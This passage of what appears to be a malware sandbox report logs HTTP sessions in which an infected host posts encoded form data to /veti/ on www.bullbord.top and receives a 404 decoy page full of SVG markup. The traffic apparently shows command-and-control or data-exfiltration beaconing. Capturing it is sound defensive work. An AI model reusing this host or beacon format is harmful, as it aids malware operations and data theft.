                                                Aug 27, 2024 08:04:29.841300964 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                Aug 27, 2024 08:04:29.841355085 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                Aug 27, 2024 08:04:29.841423035 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                Aug 27, 2024 08:04:29.841547012 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                Aug 27, 2024 08:04:29.841722965 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                Aug 27, 2024 08:04:29.841736078 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                Aug 27, 2024 08:04:29.841747046 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                Aug 27, 2024 08:04:29.841758966 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                Aug 27, 2024 08:04:29.841799974 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                Aug 27, 2024 08:04:30.006048918 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                75192.168.11.2049917203.161.46.20580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:32.373034954 CEST1154OUTPOST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 36 64 68 2b 59 68 39 78 36 54 30 47 4c 35 34 69 73 33 6c 5a 67 47 66 41 50 31 39 55 4b 65 36 44 45 6e 35 42 2b 38 58 64 6f 67 68 67 37 44 55 78 6d 43 70 52 6a 6e 47 36 4a 52 69 2b 57 6b 31 4f 4d 73 58 4b 6b 41 7a 5a 46 7a 70 4b 76 6a 74 62 71 64 78 73 68 76 76 77 44 67 35 38 42 53 4f 4d 72 54 68 6a 4a 70 33 35 68 5a 4b 63 6b 55 39 77 67 71 6a 33 73 51 65 7a 56 6f 45 38 4c 43 35 4f 43 37 51 68 49 6d 4a 59 77 33 4d 70 35 71 54 46 36 56 66 6b 41 36 6a 41 31 6e 35 32 63 53 76 6d 2b 4c 70 47 2b 43 73 45 44 38 39 73 4d 2b 64 4b 53 2b 4a 75 55 63 6a 31 73 57 70 35 71 6c 41 64 55 45 77 4c 73 67 76 2b 51 75 31 6e 4e 58 67 62 6e 38 63 78 58 78 4e 53 4b 53 6d 75 45 4c 2b 52 33 32 70 5a 4b 56 64 33 70 32 4f 59 6d 72 68 4e 63 55 45 31 69 42 5a 39 71 41 74 2b 4a 53 78 63 32 6b 6d 4c 34 42 6c 6d 71 70 57 38 4f 39 75 66 70 73 65 6d 42 75 71 64 51 66 72 56 4e 6d 71 44 4c 37 35 2b 63 53 32 55 78 4a 56 38 4a 4d 5a 45 30 74 4d 78 37 38 38 70 33 42 4a 52 61 47 [TRUNCATED]
                                                Data Ascii: ij60MtY=PRYlSxU0BJHV6dh+Yh9x6T0GL54is3lZgGfAP19UKe6DEn5B+8Xdoghg7DUxmCpRjnG6JRi+Wk1OMsXKkAzZFzpKvjtbqdxshvvwDg58BSOMrThjJp35hZKckU9wgqj3sQezVoE8LC5OC7QhImJYw3Mp5qTF6VfkA6jA1n52cSvm+LpG+CsED89sM+dKS+JuUcj1sWp5qlAdUEwLsgv+Qu1nNXgbn8cxXxNSKSmuEL+R32pZKVd3p2OYmrhNcUE1iBZ9qAt+JSxc2kmL4BlmqpW8O9ufpsemBuqdQfrVNmqDL75+cS2UxJV8JMZE0tMx788p3BJRaG3oUEFYPP4sL5ImB0xgUs0IqTcnE+KNKXWURrzD6/Sa1NHNE+xcmg/nMbp3fIXJgxUn8fWfnMPnFw4N/qTtR5xsYec3x0MFI+3YaW5xDKwwQT8hbFRCr9pJk+vmg8FOF6BmYkhm2vCS7t8FWN9cKq1pLbhiJpKBWNwzaCOWHVx0BWUk1Owts/nUWC4QQvz3i+gP0JwiVtVyO+E=
                                                Aug 27, 2024 08:04:32.544738054 CEST1289INHTTP/1.1 404 Not Found
                                                Date: Tue, 27 Aug 2024 06:04:32 GMT
                                                Server: Apache
                                                Content-Length: 16052
                                                Connection: close
                                                Content-Type: text/html
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel="stylesheet" href="/42.css"></head><body>... partial:index.partial.html --><main> <svg viewBox="0 0 541.17206 328.45184" height="328.45184" width="541.17206" id="svg2" version="1.1"> <metadata id="metadata8"> </metadata> <defs id="defs6"> <pattern patternUnits="userSpaceOnUse" width="1.5" height="1" patternTransform="translate(0,0) scale(10,10)" id="Strips2_1"> <rect style="fill:black;stroke:none" x="0" y="-0.5" width="1" height="2" id="rect5419" /> </pattern> <linearGradient osb:paint="solid" id="linearGradient6096"> <stop id="stop6094" offset="0" [TRUNCATED]
                                                Aug 27, 2024 08:04:32.544775009 CEST1289INData Raw: 31 34 35 31 35 2c 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 69 64 3d 22 6c 61 79 65 72 31 22 3e 0a 20 20 20 20 20 20 3c 67 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 67 36 32 31 39 22 0a 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20
                                                Data Ascii: 14515,0.038164)" id="layer1"> <g id="g6219" > <path transform="matrix(1.0150687,0,0,11.193923,-1.3895945,-2685.7441)" style="display:inline;fill:#000000;fill-opacity:1;stroke:#000000
                                                Aug 27, 2024 08:04:32.544940948 CEST1289INData Raw: 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 30 2e 32 33 37 34 33 33 39 33 70 78 3b 73 74 72 6f 6b
                                                Data Ascii: style="display:inline;fill:#000000;stroke:none;stroke-width:0.23743393px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4496" d="m 85.115421,100.5729 c -0.0036,3.37532 -0.0
                                                Aug 27, 2024 08:04:32.544996977 CEST1289INData Raw: 31 35 37 34 37 35 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 34 3b 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 6e 6f 6e 65 3b 73 74 72 6f 6b 65 2d 6f 70 61 63 69 74 79 3a 31 3b 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c
                                                Data Ascii: 157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path id="path4513" d="m 74.6875,125.03748 c -8.394789,7.68654 -16.790624,15.37405 -23.988969,22.38484 -7.198345,7.0108 -13.197555,13.34
                                                Aug 27, 2024 08:04:32.545026064 CEST1289INData Raw: 6e 6f 6e 65 3b 73 74 72 6f 6b 65 3a 23 30 30 30 30 30 30 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 31 70 78 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3a 62 75 74 74 3b 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3a 6d 69 74 65 72 3b 73 74 72
                                                Data Ascii: none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4521" d="m 96.8125,126.22498 c 6.89586,6.45836 13.7917,12.9167 19.98957,19.14581 6.19786,6.2
                                                Aug 27, 2024 08:04:32.545136929 CEST1289INData Raw: 39 38 38 35 2c 31 31 2e 35 31 37 37 31 20 31 32 2e 33 31 39 39 36 2c 32 33 2e 30 33 35 37 37 20 31 36 2e 38 33 37 32 34 2c 33 31 2e 37 38 39 30 34 20 34 2e 35 31 37 32 38 2c 38 2e 37 35 33 32 37 20 37 2e 32 39 39 36 34 2c 31 34 2e 35 34 39 38 35
                                                Data Ascii: 9885,11.51771 12.31996,23.03577 16.83724,31.78904 4.51728,8.75327 7.29964,14.54985 9.24424,18.32123 1.9446,3.77138 3.00519,5.42118 4.1838,9.19262 1.17861,3.77144 2.47477,9.6631 1.94443,23.80647 -0.53034,14.14338 -2.88706,36.53226 -5.4209,56.44
                                                Aug 27, 2024 08:04:32.545183897 CEST1289INData Raw: 20 31 2e 30 30 31 37 31 31 2c 33 36 2e 38 38 37 30 31 20 31 2e 35 39 30 39 39 39 2c 35 34 2e 33 32 39 39 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 66 69 6c 6c 3a 6e 6f 6e 65
                                                Data Ascii: 1.001711,36.88701 1.590999,54.32995" style="display:inline;fill:none;stroke:#000000;stroke-width:1px;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;" /> <path id="path4545" d="m 83.
                                                Aug 27, 2024 08:04:32.545212984 CEST1289INData Raw: 20 64 3d 22 6d 20 34 32 2e 34 32 36 34 30 37 2c 31 35 35 2e 33 38 38 32 35 20 63 20 33 2e 34 31 38 34 2c 30 2e 38 32 35 31 33 20 36 2e 38 33 36 30 38 32 2c 31 2e 36 35 30 30 39 20 31 30 2e 36 30 36 39 39 37 2c 32 2e 31 38 30 33 34 20 33 2e 37 37
                                                Data Ascii: d="m 42.426407,155.38825 c 3.4184,0.82513 6.836082,1.65009 10.606997,2.18034 3.770916,0.53024 7.89657,0.76599 11.608535,0.88382 3.711965,0.11782 7.012548,0.11782 10.429711,0.0589 3.417163,-0.0589 6.953769,-0.17681 10.606588,-0.23572 3.652818,
                                                Aug 27, 2024 08:04:32.545454025 CEST1289INData Raw: 74 68 34 36 31 34 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 3b 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66
                                                Data Ascii: th4614" style="display:inline;opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <ellipse ry="4.315
                                                Aug 27, 2024 08:04:32.545488119 CEST1289INData Raw: 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 3a 23 30 30 30 30 30 30 3b 66 69 6c 6c 2d 6f 70 61 63 69 74 79 3a 31 3b 66 69 6c 6c 2d 72 75 6c 65 3a 6e 6f 6e 7a 65 72 6f 3b 73 74 72 6f 6b 65 3a 23 30 30 30
                                                Data Ascii: style="opacity:1;fill:#000000;fill-opacity:1;fill-rule:nonzero;stroke:#000000;stroke-width:1.00157475;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1;" /> <path transform="translate(-170.14515,-0.03816
                                                Aug 27, 2024 08:04:32.710145950 CEST1289INData Raw: 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 31 37 30 2e 31 34 35 31 35 2c 2d 30 2e 30 33 38 31 36 34 29 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 70 61 74 68 34 36 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 64 3d
                                                Data Ascii: sform="translate(-170.14515,-0.038164)" id="path4610" d="m 318,180.45184 c 0.66667,0 1.33434,0 1.501,0.16616 0.16667,0.16617 -0.16667,0.49951 0.001,0.66667 0.16767,0.16717 0.68771,0.16717 0.89053,0.36949 0.20282,0.202


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                76192.168.11.2049918203.161.46.20580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:35.077394009 CEST2578OUTPOST /veti/ HTTP/1.1
                                                Host: www.bullbord.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.bullbord.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.bullbord.top/veti/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 50 52 59 6c 53 78 55 30 42 4a 48 56 36 64 68 2b 59 68 39 78 36 54 30 47 4c 35 34 69 73 33 6c 5a 67 47 66 41 50 31 39 55 4b 65 79 44 46 52 74 42 2f 66 2f 64 70 67 68 67 6e 54 55 77 6d 43 70 4d 6a 6e 65 41 4a 52 75 75 57 6d 64 4f 50 2f 66 4b 6e 79 4c 5a 41 7a 70 4c 6a 44 74 5a 75 64 78 65 68 76 6a 61 44 67 74 47 42 68 53 4d 71 56 52 6a 4f 65 6a 36 74 70 4b 61 6b 55 39 73 33 36 6a 2f 73 51 61 6a 56 6f 41 38 4c 45 68 4f 54 5a 34 68 4b 31 78 59 6b 33 4d 71 7a 4b 54 4f 76 6c 66 42 41 36 6e 55 31 6e 35 4d 63 54 72 6d 2b 4d 64 47 39 42 55 48 43 63 39 73 53 4f 64 4a 57 2b 31 71 55 63 76 39 73 57 74 35 71 6b 6b 64 56 6b 77 4c 36 54 33 68 48 2b 30 73 4a 58 67 4d 74 63 41 44 58 31 6c 34 4b 51 71 75 44 2f 57 52 78 56 52 5a 5a 6b 64 33 67 32 4f 65 70 4c 68 65 53 30 45 70 69 41 31 58 71 41 4e 49 4a 56 78 63 33 46 47 4c 71 51 6c 6c 73 4a 57 36 53 4e 76 66 74 73 61 51 42 75 37 43 51 66 72 46 4e 69 61 44 4c 4c 70 2b 66 54 32 54 78 5a 56 37 50 4d 5a 72 69 64 41 4e 37 38 67 66 33 42 78 42 61 41 [TRUNCATED]
                                                Data Ascii: ij60MtY=PRYlSxU0BJHV6dh+Yh9x6T0GL54is3lZgGfAP19UKeyDFRtB/f/dpghgnTUwmCpMjneAJRuuWmdOP/fKnyLZAzpLjDtZudxehvjaDgtGBhSMqVRjOej6tpKakU9s36j/sQajVoA8LEhOTZ4hK1xYk3MqzKTOvlfBA6nU1n5McTrm+MdG9BUHCc9sSOdJW+1qUcv9sWt5qkkdVkwL6T3hH+0sJXgMtcADX1l4KQquD/WRxVRZZkd3g2OepLheS0EpiA1XqANIJVxc3FGLqQllsJW6SNvftsaQBu7CQfrFNiaDLLp+fT2TxZV7PMZridAN78gf3BxBaAXoVkFYZMgrBJIhJUw5bM0lqTQVE/f4KkSURbjDsPSd/NHJPexWwg/nMbkQfIbJgEwn9vmfifnnVA4X/qT8R59fYd9Wx08/I8bYaHpxELw3Fz8kfFRVldUTk+jug8UxFNZmeXZmyvCNu98eCd8dOqx1LYVTJqWRWOAzekHXSmJWX14S5MQnrceBYVoSG+ngjJAs0p0aCPRGQrOawGOPI+4JDOSIMV/t+aWtVVguj/NbvQwbA1hKQ402hVoXqOSomwU2Twi387zpLSTfz145E7EfnxhjX6OgVElzb/7V5S5ZfOi3UXHbjzyudrxnlv5k3mK5tEAiIBM8kerjqSz8sNUHl0oZSaU93bZIKo83o7jd4qkU/1FdNrOI9qsOkoCJB8sql12aTvcNrlwljNYm+eFxKZCRYIglqVkOIDEzmMYM1xiw88tX3cOKLUySahmRmZ4jXAq/B4u1br0YLo4SSDRfaYiO/MRTxkHBJCmEiWgUegkceDq3SX7PsqHI/TSnXfc/vQ+a/P9F5yTgVL2Iw1Ajo1FIR3KAI60Ej+qqDT+T9rIgZigIY1i5z6f3LD/S6sZwF+PEeLifmOwTMcC2n3ws1velmiVe/OdnG+tPM7lVOR+tnummgJGSMHHu4hkEYRUc7LpMJAdd3yg0eq/xq17FFsHy76ZkF+QC [TRUNCATED]
                                                Aug 27, 2024 08:04:35.077414036 CEST5156OUTData Raw: 78 34 69 4a 49 6c 59 42 32 76 58 72 77 6c 75 78 73 2f 31 39 4a 71 67 2f 6a 70 5a 39 62 68 51 59 38 6f 35 62 73 68 5a 64 4e 36 30 49 73 49 31 63 77 44 47 74 78 33 59 44 32 70 79 61 31 2f 4d 50 68 34 69 4e 41 6b 52 34 6e 31 6b 4d 6e 39 34 2f 70 4f
                                                Data Ascii: x4iJIlYB2vXrwluxs/19Jqg/jpZ9bhQY8o5bshZdN60IsI1cwDGtx3YD2pya1/MPh4iNAkR4n1kMn94/pOA6aItzID371nkImHjO9cSzcscjVUfX098336Zoa+4HRk2/DRVOHuzXKwx9kTE5diTMW3xQF5aO5kM4kT3Nuu+p7x0lJjyrhZw1zkn5AKxW/fWE/2ND7VIQWbcGLcP8WtBH1C5Ea/fJ0/izNmy3X/efqXrKhHKZbUS
                                                Aug 27, 2024 08:04:35.077461004 CEST5156OUTData Raw: 47 33 41 5a 77 63 56 37 73 78 58 7a 58 63 53 47 34 36 41 51 61 77 66 43 71 57 51 49 47 79 74 31 42 4f 47 41 66 77 59 37 61 74 62 65 52 2b 58 55 4d 61 6b 54 64 6c 65 4d 45 2b 4a 4f 7a 30 59 43 5a 52 56 78 63 38 57 6e 7a 57 4d 4a 67 64 36 51 5a 31
                                                Data Ascii: G3AZwcV7sxXzXcSG46AQawfCqWQIGyt1BOGAfwY7atbeR+XUMakTdleME+JOz0YCZRVxc8WnzWMJgd6QZ1R+N4T8d9LT0bVZ/wTxHy39UzLN0kik0VoPnzlKKJ/ceI2FZbAlfWRAYUunM1cZZE/o/d6T4kXKb8oNriBKJRp32FDbSDoKyogsOPUu/QwgE1ZkcOO17j6fOmdNQ3ozzaaOBmhHi1WjNrXzV/DSSVam0Kd3Vwxl302
                                                Aug 27, 2024 08:04:35.244333982 CEST2578OUTData Raw: 6c 41 47 54 62 64 57 66 75 58 4e 39 49 66 6f 4a 77 33 70 42 5a 76 33 70 47 5a 2f 4b 72 63 71 6b 34 4c 63 50 71 4f 4f 66 4b 41 65 4d 69 70 78 41 6a 61 51 6e 39 41 6d 38 37 59 77 4a 75 55 6b 79 72 49 64 67 49 49 74 69 72 58 7a 61 55 52 6e 32 54 6d
                                                Data Ascii: lAGTbdWfuXN9IfoJw3pBZv3pGZ/Krcqk4LcPqOOfKAeMipxAjaQn9Am87YwJuUkyrIdgIItirXzaURn2Tm+B9PipsWrEiXwMGcllYejCmaU31f+p7jiYD6/lEUnm5ZiCwmzamePnTQPzh+Y6ulXYy698/s0gUm2Duoqa5dnCgGgqms5iwRi5lqdY4jFv1zlekn9vlROodVr4lIE9jLc3s/9HYg+u9MT+Qu0q/IlF0nt5NMpi8iL
                                                Aug 27, 2024 08:04:35.244508028 CEST12890OUTData Raw: 52 64 43 30 67 43 76 4a 6e 33 2f 39 56 54 47 43 37 73 4c 6b 46 51 69 70 71 74 36 48 66 53 2f 42 30 67 68 7a 4e 50 67 4a 4f 64 78 36 36 72 74 42 50 6f 72 6b 45 4a 36 33 79 61 56 69 48 76 6a 50 43 76 4f 55 68 4d 5a 30 64 74 30 4f 59 79 79 2b 31 7a
                                                Data Ascii: RdC0gCvJn3/9VTGC7sLkFQipqt6HfS/B0ghzNPgJOdx66rtBPorkEJ63yaViHvjPCvOUhMZ0dt0OYyy+1zIytX4DO4tLsKPZEJ2yUJL3KcheJKpYoyz8EB7qR52/MMqYE/nHX+KR8e7ZdM9d4puXSnRojB/c73cAeKews1ZLdVN5Fw10dIpboWlb5S45n04l3nmKcYpZIj81gMMsNq9d1V7pZx5UWXy/QIYQKNqdnBYosKYW4aB
                                                Aug 27, 2024 08:04:35.244853973 CEST2578OUTData Raw: 42 6e 2f 74 44 5a 67 79 49 42 4b 70 56 54 58 77 58 34 38 67 68 39 35 34 39 47 4a 68 63 61 31 31 61 75 41 43 6d 57 63 31 65 44 53 43 48 42 6c 34 47 52 58 64 55 65 76 45 76 2f 77 37 68 71 7a 76 71 58 79 6d 7a 58 30 4e 48 61 7a 35 4a 44 77 49 64 73
                                                Data Ascii: Bn/tDZgyIBKpVTXwX48gh9549GJhca11auACmWc1eDSCHBl4GRXdUevEv/w7hqzvqXymzX0NHaz5JDwIdslf0RPfYFnpcM5ZvjHjJcpbXhwnWaQVFHEfUt44kGZib/o1xDNQliwtSQiRMKr8VGZ8OdQJi1By4tgoNPEsHGZJjsFrLVV2xHjAUQd3rT28bKbxtFJs52GPvm7SOLFwuxUielO6g4NKWDk0UR5a0uN6qNFogQ+iXYI
                                                Aug 27, 2024 08:04:35.245032072 CEST7734OUTData Raw: 61 6b 75 58 78 50 35 43 77 74 66 5a 35 70 70 39 49 6f 32 35 49 6c 47 73 7a 38 44 6b 6c 39 63 69 45 48 50 57 47 79 33 4a 62 4a 78 69 69 71 33 74 34 2b 4b 35 76 77 7a 73 4f 30 52 31 45 6d 57 69 76 64 7a 43 74 63 56 50 6c 38 5a 45 6d 6a 64 4b 61 78
